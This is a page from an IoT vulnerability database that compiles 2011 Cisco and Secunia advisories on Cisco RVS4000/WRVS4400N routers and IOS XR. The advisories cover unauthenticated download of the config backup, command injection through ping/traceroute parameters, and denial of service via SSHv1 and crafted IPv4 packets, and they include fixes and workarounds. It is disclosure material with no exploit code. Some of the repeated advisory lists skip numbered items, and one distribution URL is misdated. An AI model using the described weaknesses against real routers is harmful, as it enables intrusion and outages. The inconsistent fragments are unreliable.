VARIoT IoT vulnerabilities database

VAR-201105-0190 CVE-2011-1645 Cisco RVS4000/WRVS4400N Web Management Interface Information Disclosure Vulnerability
CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
The web management interface on the Cisco RVS4000 Gigabit Security Router with software 1.x before 1.3.3.4 and 2.x before 2.0.2.7, and the WRVS4400N Gigabit Security Router with software before 2.0.2.1, allows remote attackers to read the backup configuration file, and consequently execute arbitrary code, via unspecified vectors, aka Bug ID CSCtn23871. A third party may read the backup configuration file and, as a result, execute arbitrary code. The Cisco RVS4000/WRVS4400N is a Gigabit Cisco router. If the administrator of the device previously created a configuration backup using Administration --> Backup & Restore --> Backup, a remote unauthenticated user can access the backup configuration file, which includes all device configuration parameters, including the HTTP authentication password and VPN shared keys (PSKs). Cisco RVS4000 and WRVS4400N routers are prone to an information-disclosure vulnerability. An attacker can exploit this issue to obtain potentially sensitive information. This may aid in further attacks. This issue is being tracked by Cisco bug ID CSCtn23871.

----------------------------------------------------------------------

TITLE:
Cisco RVS4000 / WRVS4400N Gigabit Security Routers Multiple Vulnerabilities

SECUNIA ADVISORY ID:
SA44724

VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/44724/

RELEASE DATE:
2011-05-26

DESCRIPTION:
Some vulnerabilities have been reported in Cisco RVS4000 and WRVS4400N Gigabit Security Routers, which can be exploited by malicious users to compromise a vulnerable system and by malicious people to disclose sensitive information.

1) The web management interface does not properly restrict access to the backup configuration file, which can be exploited to download the file and disclose sensitive information.

2) Input passed via the "ping" or "traceroute" parameters to the web management interface is not properly sanitised before being used. This can be exploited to inject and execute arbitrary shell commands.

3) An unspecified error in the web management interface can be exploited to retrieve the administrator's private and public keys for SSL certificates.

Please see the vendor's advisory for the list of affected products.

SOLUTION:
Apply updates when available (Scheduled for June 19, 2011).

PROVIDED AND/OR DISCOVERED BY:
The vendor credits Michal Sajdak, Securitum.

ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20110525-rvs4000.shtml

----------------------------------------------------------------------
VAR-201105-0191 CVE-2011-1646 Cisco RVS4000 Gigabit Security Router Software and WRVS4400N Gigabit Security Router Software vulnerabilities
CVSS V2: 9.0
CVSS V3: -
Severity: HIGH
The web management interface on the Cisco RVS4000 Gigabit Security Router with software 1.x before 1.3.3.4 and 2.x before 2.0.2.7, and the WRVS4400N Gigabit Security Router with software before 2.0.2.1, allows remote authenticated users to execute arbitrary commands via the (1) ping test parameter or (2) traceroute test parameter, aka Bug ID CSCtn23871. The Cisco RVS4000/WRVS4400N is a Gigabit Cisco router. The Cisco RVS4000/WRVS4400N has a command injection vulnerability that allows arbitrary commands to be executed as root. This issue is being tracked by Cisco bug ID CSCtn23871.
VAR-201105-0045 CVE-2011-0949 Cisco IOS XR SSHv1 '/tmp/ssh_lock' Remote Denial of Service Vulnerability
CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Cisco IOS XR 3.6.x, 3.8.x before 3.8.3, and 3.9.x before 3.9.1 does not properly remove sshd_lock files from /tmp/, which allows remote attackers to cause a denial of service (disk consumption) by making many SSHv1 connections, aka Bug ID CSCtd64417. A third party may cause a denial of service (disk consumption) by making a large number of SSHv1 connections. Available disk space in the '/tmp' filesystem may be consumed. An attacker can exploit this issue to cause a denial-of-service condition. This issue is being tracked by Cisco Bug ID CSCtd64417.

----------------------------------------------------------------------

TITLE:
Cisco IOS XR Multiple Vulnerabilities

SECUNIA ADVISORY ID:
SA44725

VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/44725/

RELEASE DATE:
2011-05-26

DESCRIPTION:
Some vulnerabilities have been reported in Cisco IOS XR, which can be exploited by malicious people to cause a DoS (Denial of Service).

1) An unspecified error exists when processing IPv4 packets originating from the Cisco Line Card or Cisco CRS MSC and can be exploited to crash the NetIO process.

Successful exploitation of this vulnerability requires that an IPv4 address is configured on one of the interfaces of a Cisco Line Card or Cisco CRS MSC.

3) An unspecified error when processing IPv4 packets can be exploited to reload the SPA (Shared Port Adapters) Interface Processor.

Successful exploitation of this vulnerability requires that an IPv4 address is configured on any of the SPA interface processor interfaces.

SOLUTION:
Apply updates. Please see the vendor's advisory for more information.

PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor.
2) The vendor credits a customer.
3) Reported by the vendor.

ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr-ssh.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxrspa.shtml

----------------------------------------------------------------------
Cisco Security Advisory: Cisco IOS XR Software SSHv1 Denial of Service Vulnerability

Advisory ID: cisco-sa-20110525-iosxr-ssh

Revision 1.0

For Public Release 2011 May 25 1600 UTC (GMT)

+---------------------------------------------------------------------

Summary
=======

Cisco IOS XR Software contains a vulnerability in the SSH application that may result in a denial of service condition when the SSH version 1 (SSHv1) protocol is used.

Cisco has released free software updates that address this vulnerability.

This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr-ssh.shtml

Affected Products
=================

This vulnerability affects all unfixed versions of Cisco IOS XR Software devices configured to accept SSHv1 connections. Details on the affected versions can be found in the Software Versions and Fixes section of this advisory.

Vulnerable Products
+------------------

To determine the Cisco IOS XR Software release that is running on a Cisco product, administrators can log in to the device and issue the show version command to display the system banner. The system banner confirms that the device is running Cisco IOS XR Software by displaying text similar to "Cisco IOS XR Software". The software version is displayed after the text "Cisco IOS XR Software".

The following example identifies a Cisco CRS-1 that is running Cisco IOS XR Software Release 3.6.2:

    RP/0/RP0/CPU0:CRS#show version
    Tue Aug 18 14:25:17.407 AEST

    Cisco IOS XR Software, Version 3.6.2[00]
    Copyright (c) 2008 by Cisco Systems, Inc.

    ROM: System Bootstrap, Version 1.49(20080319:195807) [CRS-1 ROMMON],

    CRS uptime is 4 weeks, 4 days, 1 minute
    System image file is "disk0:hfr-os-mbi-3.6.2/mbihfr-rp.vm"

    cisco CRS-8/S (7457) processor with 4194304K bytes of memory.
    7457 processor at 1197Mhz, Revision 1.2

    17 Packet over SONET/SDH network interface(s)
    1 DWDM controller(s)
    17 SONET/SDH Port controller(s)
    8 TenGigabitEthernet/IEEE 802.3 interface(s)
    2 Ethernet/IEEE 802.3 interface(s)
    1019k bytes of non-volatile configuration memory.
    38079M bytes of hard disk.
    981440k bytes of ATA PCMCIA card at disk 0 (Sector size 512 bytes).

    Configuration register on node 0/0/CPU0 is 0x102
    Boot device on node 0/0/CPU0 is mem:

    !--- output truncated

The following example identifies a Cisco 12404 router that is running Cisco IOS XR Software Release 3.7.1:

    RP/0/0/CPU0:GSR#show version

    Cisco IOS XR Software, Version 3.7.1[00]
    Copyright (c) 2008 by Cisco Systems, Inc.

    ROM: System Bootstrap, Version 12.0(20051020:160303) SOFTWARE
    Copyright (c) 1994-2005 by cisco Systems, Inc.

    GSR uptime is 3 weeks, 6 days, 3 hours, 20 minutes
    System image file is "disk0:c12k-os-mbi-3.7.1/mbiprp-rp.vm"

    cisco 12404/PRP (7457) processor with 2097152K bytes of memory.
    7457 processor at 1266Mhz, Revision 1.2

    1 Cisco 12000 Series Performance Route Processor
    1 Cisco 12000 Series - Multi-Service Blade Controller
    1 1 Port ISE Packet Over SONET OC-48c/STM-16 Controller (1 POS)
    1 Cisco 12000 Series SPA Interface Processor-601/501/401
    3 Ethernet/IEEE 802.3 interface(s)
    1 SONET/SDH Port controller(s)
    1 Packet over SONET/SDH network interface(s)
    4 PLIM QoS controller(s)
    8 FastEthernet/IEEE 802.3 interface(s)
    1016k bytes of non-volatile configuration memory.
    1000496k bytes of disk0: (Sector size 512 bytes).
    65536k bytes of Flash internal SIMM (Sector size 256k).

    Configuration register on node 0/0/CPU0 is 0x2102
    Boot device on node 0/0/CPU0 is disk0:

    !--- output truncated

Additional information about Cisco IOS XR Software release naming conventions is available in "White Paper: Cisco IOS Reference Guide" at the following link:
http://www.cisco.com/web/about/security/intelligence/ios-ref.html#9

Additional information about Cisco IOS XR Software time-based release model is available in "White Paper: Guidelines for Cisco IOS XR Software" at the following link:
http://www.cisco.com/en/US/prod/collateral/iosswrel/ps8803/ps5845/product_bulletin_c25-478699.html

SSHv1 is configured in Cisco IOS XR Software with the configuration command ssh server enable. The device is vulnerable if it is running an affected Cisco IOS XR Software release and has SSHv1 enabled.

The following example shows a device that is running Cisco IOS XR Software that is configured with SSHv1:

    (Router)# show running-config | inc ssh
    ssh server vrf default

If the command returns "ssh server v2", then the SSH server is not configured to accept SSHv1 connections and the device is not vulnerable.

Details
=======

This vulnerability affects Cisco IOS XR devices that are running affected software releases and are configured to accept SSHv1 connections. This file begins with the text "sshd_lock" and may not be properly removed when the session ends. Multiple connections may consume all available space in the /tmp filesystem and cause the system to crash, leading to a denial of service condition.

Vulnerability Scoring Details
+----------------------------

Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss

* SSHv1 may leave /tmp/sshd_lock files

CVSS Base Score - 7.8
    Access Vector          - Network
    Access Complexity      - Low
    Authentication         - None
    Confidentiality Impact - None
    Integrity Impact       - None
    Availability Impact    - Complete

CVSS Temporal Score - 6.4
    Exploitability         - Functional
    Remediation Level      - Official-Fix
    Report Confidence      - Confirmed

Impact
======

Successful exploitation of this vulnerability may cause the Cisco IOS XR device to crash, resulting in a denial of service condition.

Software Versions and Fixes
===========================

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

This bug was introduced in Cisco IOS XR Software release 3.6.2 and is fixed with SMU hfr-k9sec-3.6.2.CSCtd74795. The SMU ID for this fix in 3.6.2 is AA03656. This vulnerability has been fixed in 3.8.3, 3.9.1, and 4.0.0 for customers running later software versions. Software version 3.7 is not affected by this vulnerability.

Workarounds
===========

SSHv1 can be disabled by configuring the SSH server to only accept SSHv2 connections.
In order to configure a device to only accept SSHv2 connections, administrators can issue the command ssh server v2.

Administrators should manually remove lock files after disabling SSHv1 or after the server is upgraded to a non-vulnerable version. The command run rm /tmp/sshd_lock* will delete any sshd_lock files on the system.

Obtaining Fixed Software
========================

Cisco has released free software updates that address this vulnerability. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com

Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.

Refer to:
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory.

Customers encountering device crashes during normal network operations reported this vulnerability to Cisco.

Status of this Notice: FINAL
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20110323-iosxr-ssh.shtml

In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

Revision History
================

+---------------------------------------+
| Revision |             | Initial      |
| 1.0      | 2011-May-25 | public       |
|          |             | release.     |
+---------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at:
http://www.cisco.com/go/psirt

+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
VAR-201105-0194 CVE-2011-1651 Cisco IOS XR SPA Interface Processor Remote Denial of Service Vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Cisco IOS XR 3.9.x and 4.0.x before 4.0.3 and 4.1.x before 4.1.1, when an SPA interface processor is installed, allows remote attackers to cause a denial of service (device reload) via a crafted IPv4 packet, aka Bug ID CSCto45095. An attacker can exploit this issue to cause a denial-of-service condition. This issue is being tracked by Cisco Bug ID CSCto45095.

----------------------------------------------------------------------

TITLE: Cisco IOS XR Multiple Vulnerabilities

SECUNIA ADVISORY ID: SA44725

VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44725/

RELEASE DATE: 2011-05-26

DESCRIPTION: Some vulnerabilities have been reported in Cisco IOS XR, which can be exploited by malicious people to cause a DoS (Denial of Service).

1) An unspecified error exists when processing IPv4 packets originating from the Cisco Line Card or Cisco CRS MSC and can be exploited to crash the NetIO process.

2) An error in the SSH server when handling an SSHv1 connection does not delete sshd_lock files in the /tmp directory. This can be exploited to consume all available disk space in the /tmp filesystem and cause a crash.

Please see the vendor's advisory for the list of affected products and versions.

SOLUTION: Apply updates. Please see the vendor's advisory for more information.

PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor.
2) The vendor credits a customer.
3) Reported by the vendor.

ORIGINAL ADVISORY: Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr-ssh.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxrspa.shtml

----------------------------------------------------------------------

Cisco has released free Software Maintenance Units (SMU) that address this vulnerability. Workarounds that mitigate this vulnerability are not available.

Vulnerable Products
+------------------

This vulnerability affects all Engine 5 Line Cards on the Cisco XR 12000 Series Routers. The engine 5 line cards are the SIP-600, SIP-601, SIP-501, and SIP-401.

To determine the Cisco IOS XR Software release that is running on a Cisco product, administrators can log in to the device and issue the show version command-line interface (CLI) command to display the system banner. The system banner confirms that the device is running Cisco IOS XR Software by displaying text that is similar to "Cisco IOS XR Software". The software version is displayed after the text "Cisco IOS XR Software". The following example identifies a Cisco XR 12000 Series Router that is running Cisco IOS XR Software Release 3.9.1:

    RP/0/0/CPU0:example#show version
    Wed Dec 15 10:16:47.117 singa
    Cisco IOS XR Software, Version 3.9.1[00]
    Copyright (c) 2010 by Cisco Systems, Inc.
    ROM: System Bootstrap, Version 12.0(20090302:133850) [rtauro-sw30346-33S 1.23dev(0.36)] DEVELOPMENT SOFTWARE
    Copyright (c) 1994-2009 by cisco Systems, Inc.
    example uptime is 26 minutes
    System image file is "disk0:c12k-os-mbi-3.9.1/mbiprp-rp.vm"
    cisco 12404/PRP (7457) processor with 3145728K bytes of memory.
    7457 processor at 1266Mhz, Revision 1.2
    1 Cisco 12000 Series Performance Route Processor
    1 Cisco 12000 Series SPA Interface Processor-601/501/401
    1 Cisco 12000 4 Port Gigabit Ethernet Controller (4 GigabitEthernet)
    3 Management Ethernet
    5 PLIM_QOS
    8 FastEthernet
    4 GigabitEthernet/IEEE 802.3 interface(s)
    1019k bytes of non-volatile configuration memory.
    982304k bytes of disk0: (Sector size 512 bytes).
    62420k bytes of disk1: (Sector size 512 bytes).
    65536k bytes of Flash internal SIMM (Sector size 256k).

    !--- output truncated

To determine if a SPA interface processor is installed in the device, administrators can log in to the device and issue the show platform command to display the system line cards.

The following products are not affected by this vulnerability:

  * Cisco 12000 Series SPA interface processors running Cisco IOS Software
  * Cisco XR 12000 Series Engine 3 Line Cards
  * Cisco ASR 9000 Series Aggregation Services Routers
  * Cisco Carrier Routing System Series Routers

No other Cisco products are currently known to be affected by this vulnerability.

Details
=======

Cisco IOS XR Software, which is part of the Cisco IOS Software family, uses a microkernel-based distributed operating system infrastructure. Cisco IOS XR Software runs on the Cisco CRS, Cisco 12000 Series Routers, and Cisco ASR 9000 Series Aggregation Services Routers.

When the SPA interface processor receives specific IPv4 packets destined for either a network or a network broadcast address of a configured interface, it will reload and produce an error message that is similar to what is shown in the example that follows. Transit traffic through the device does not trigger this vulnerability.

    RP/0/4/CPU0:Example#LC/0/1/CPU0:Apr 26 17:16:31.745 : tx_xbma[85]: %L2-E5EGRESSQ-4-INTERRUPT : WIM error: reg 0x200000

This vulnerability is documented in Cisco bug ID CSCto45095 (registered customers only) and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2011-1651.

Vulnerability Scoring Details
+----------------------------

Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss

* Cisco XR 12000 Series SPA Interface Processor Vulnerability

CVSS Base Score - 7.8
    Access Vector          - Network
    Access Complexity      - Low
    Authentication         - None
    Confidentiality Impact - None
    Integrity Impact       - None
    Availability Impact    - Complete

CVSS Temporal Score - 6.4
    Exploitability         - Functional
    Remediation Level      - Official-Fix
    Report Confidence      - Confirmed

Impact
======

Successful exploitation of the vulnerability may result in a reloading of the SPA interface processor. Repeated exploitation could result in a sustained denial of service (DoS) condition.

Software Versions and Fixes
===========================

When considering software upgrades, also consult: http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release.
If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

+--------------------------------------------------------------+
|  Major   |         Availability of Repaired Releases         |
| Release  |                                                   |
|----------+---------------------------------------------------|
| Affected |         |                              | First    |
| 3.2.X    | SMU ID  | SMU NAME                     | Fixed    |
| through  |         |                              | Release  |
| 3.8.X    |---------------------------------------------------|
| Based    | There are no affected 3.2.X through 3.8.X based   |
| Releases | releases                                          |
|----------+---------------------------------------------------|
| Affected |         |                              | First    |
| 3.9.X    | SMU ID  | SMU NAME                     | Fixed    |
| Based    |         |                              | Release  |
| Releases |         |                              |          |
|----------+---------+------------------------------+----------|
|          |         |                              | No first |
|          |         |                              | fixed    |
|          |         |                              | release; |
| 3.9.0    | None    | No SMU available; Contact    | Migrate  |
|          |         | your Support Organization    | to       |
|          |         |                              | 4.0.3,   |
|          |         |                              | 4.1.1 or |
|          |         |                              | later.   |
|----------+---------+------------------------------+----------|
|          |         |                              | No first |
|          |         |                              | fixed    |
|          |         |                              | release; |
| 3.9.1    | AA04896 | c12k-os-mbi-3.9.1.CSCto45095 | Migrate  |
|          |         |                              | to       |
|          |         |                              | 4.0.3,   |
|          |         |                              | 4.1.1 or |
|          |         |                              | later.   |
|----------+---------+------------------------------+----------|
|          |         |                              | No first |
|          |         |                              | fixed    |
|          |         |                              | release; |
| 3.9.2    | AA04907 | c12k-os-mbi-3.9.2.CSCto45095 | Migrate  |
|          |         |                              | to       |
|          |         |                              | 4.0.3,   |
|          |         |                              | 4.1.1 or |
|          |         |                              | later.   |
|----------+---------+------------------------------+----------|
| Affected |         |                              | First    |
| 4.0.x    | SMU ID  | SMU NAME                     | Fixed    |
| Based    |         |                              | Release  |
| Releases |         |                              |          |
|----------+---------+------------------------------+----------|
| 4.0.0    | None    | No SMU available; Contact    | 4.0.3    |
|          |         | your Support Organization    |          |
|----------+---------+------------------------------+----------|
| 4.0.1    | AA04884 | c12k-4.0.1.CSCto45095        | 4.0.3    |
|----------+---------------------------------------------------|
| 4.0.3    | Not Affected                                      |
|----------+---------------------------------------------------|
| Affected |         |                              | First    |
| 4.1.x    | SMU ID  | SMU NAME                     | Fixed    |
| Based    |         |                              | Release  |
| Releases |         |                              |          |
|----------+---------+------------------------------+----------|
| 4.1.0    | None    | No SMU available; Contact    | 4.1.1    |
|          |         | your Support Organization    |          |
|----------+---------------------------------------------------|
| 4.1.1    | Not Affected                                      |
+--------------------------------------------------------------+

Workarounds
===========

There are no workarounds for this vulnerability.

Using Infrastructure Access Control Lists (iACLs) may help limit the attack surface of this vulnerability. Although it is often difficult to block traffic that transits a network, it is possible to identify traffic that should never be allowed to target infrastructure devices and block that traffic at the border of networks. As a network security best practice, iACLs should be considered a long-term addition to good network security.

Because some of the packets used in this vulnerability could utilize UDP as a transport, it could be possible to spoof the sender's IP address, which may defeat ACLs that permit communication to these ports from trusted IP addresses. Unicast RPF should be considered to be used in conjunction to offer a better mitigation solution.

For more information on iACLs, consult the document "Limit Network Access with Access Control Lists" at the following location:
http://www.cisco.com/web/about/security/intelligence/CiscoIOSXR.html#19

Obtaining Fixed Software
========================

Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com

Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.

Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory.

This vulnerability was discovered when handling customer support calls.

Status of this Notice: FINAL
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxrspa.shtml

In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

Revision History
================

+---------------------------------------+
| Revision |             | Initial      |
| 1.0      | 2011-May-25 | public       |
|          |             | release.     |
+---------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt

+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
VAR-201105-0054 CVE-2011-0943 Cisco IOS XR NetIO Process Remote Denial of Service Vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Cisco IOS XR 3.8.3, 3.8.4, and 3.9.1 allows remote attackers to cause a denial of service (NetIO process restart or device reload) via a crafted IPv4 packet, aka Bug ID CSCth44147. An attacker can exploit this issue to cause a denial-of-service condition. This issue is being tracked by Cisco Bug ID CSCth44147. A remote attacker could exploit this vulnerability to crash the application and deny service to legitimate users.

----------------------------------------------------------------------

TITLE: Cisco IOS XR Multiple Vulnerabilities

SECUNIA ADVISORY ID: SA44725

VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44725/

RELEASE DATE: 2011-05-26

DESCRIPTION: Some vulnerabilities have been reported in Cisco IOS XR, which can be exploited by malicious people to cause a DoS (Denial of Service).

2) An error in the SSH server when handling an SSHv1 connection does not delete sshd_lock files in the /tmp directory. This can be exploited to consume all available disk space in the /tmp filesystem and cause a crash.

3) An unspecified error when processing IPv4 packets can be exploited to reload the SPA (Shared Port Adapters) Interface Processor. Successful exploitation of this vulnerability requires that an IPv4 address is configured on any of the SPA interface processor interfaces.

Please see the vendor's advisory for the list of affected products and versions.

SOLUTION: Apply updates. Please see the vendor's advisory for more information.

PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor.
2) The vendor credits a customer.
3) Reported by the vendor.

ORIGINAL ADVISORY: Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr-ssh.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxrspa.shtml

----------------------------------------------------------------------

Successful exploitation could cause the NetIO process to restart. Under a sustained attack, the Cisco CRS Modular Services Card (MSC) on a Cisco Carrier Routing System (CRS) or a Line Card on a Cisco 12000 Series Router or Cisco ASR 9000 Series Aggregation Services Router will reload.

Cisco has released free Software Maintenance Units (SMU) that address this vulnerability. There are no workarounds for this vulnerability.

This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr.shtml

Affected Products
=================

